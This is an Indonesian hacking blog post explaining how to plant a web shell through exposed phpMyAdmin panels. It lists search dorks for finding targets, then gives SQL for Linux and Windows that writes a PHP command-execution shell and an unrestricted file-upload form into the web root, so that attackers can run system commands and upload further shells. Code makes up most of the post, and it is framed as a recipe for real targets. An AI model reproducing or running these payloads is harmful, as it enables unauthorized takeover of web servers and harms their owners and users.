Cara Tanam Shell Di PhpMyadmin
Maret 30, 2021
2
Cara Tanam Shell Di PhpMyadmin
Oleh xN5
Assalamualaikum hallo gan balik lagi sama gua kali gua bakal kasih tutorial Cara Tanam Shell Di phpmyadmin
dork:
inurl:/security/security.php
inurl:/phpmyadmin/index.php
dll gunakan logikanya aja...
kalo udah ketemu targetnya kita mulai:
UPDATE:
Ane juga pernah nyobain di localhost
PhpMyAdmin yang ane pakai bawaan dari LAMPP (Linux) yaitu versi 3.2.4
Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL
Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
*Untuk mesin Windows
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Klik Go!
Note : Jika XAMPP terinstall di direktori lain, silahkan ganti codingnya di bagian SELECT * INTO OUTFILE 'alamat htdocs nya xampp/cmd.php' from temptab;
Oke ane anggap hasilnya seperti ini :
Your SQL Query has been executed successful
Itu artinya kita udah bisa membuka file cmd.php, silahkan buka http://localhost/cmd.php?cmd=Masukkan perintah OS (Linux atau Windows)
Contoh : http://localhost/cmd.php?cmd=ls <-- ls adalah perintah untuk ngeliat isi file dan direktori di mesin Linux, kalo Windows ya pake dir.
Lanjut lagi!
Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL
Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
*Untuk mesin Windows
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Dan kemudian Klik Go!
Ulangi lagi kita buka PhpMyAdminnya, kemudian pilih menu SQL
Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "/opt/lampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Untuk mesin Windows
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Dan kemudian Klik Go!
Ane anggep sukses, sekarang buka http://localhost/form.php
Silahkan di upload Shellnya atau file .php, .html, .htm, .txt, dan lain sebagainya.
sumber : lastc0de [X]devilzc0de
